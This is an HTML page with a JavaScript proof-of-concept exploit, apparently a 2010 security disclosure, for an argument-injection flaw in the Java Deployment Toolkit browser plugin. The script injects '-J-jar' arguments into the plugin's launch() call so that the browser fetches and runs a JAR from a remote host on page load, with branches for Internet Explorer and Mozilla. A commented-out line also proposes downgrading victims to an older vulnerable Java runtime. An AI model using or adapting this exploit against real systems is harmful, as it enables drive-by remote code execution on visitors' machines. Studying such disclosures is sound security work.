Java Deployment Toolkit Test Page

<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
    <script>
        // Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010

        var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");

            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

            // Trigger the bug
            o.launch(u);
        } else {
            // Mozilla
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");

            o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
            n.type = "application/java-deployment-toolkit";
            document.body.appendChild(o);
            document.body.appendChild(n);

            // Test both MIME types
            try {
                // Old type
                o.launch(u);
            } catch (e) {
                // New type
                n.launch(u);
            }
        }

        // Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
        // this classic exploit?
        // http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1

        // o.installJRE("1.4.2_18");
    </script>
</body>
</html>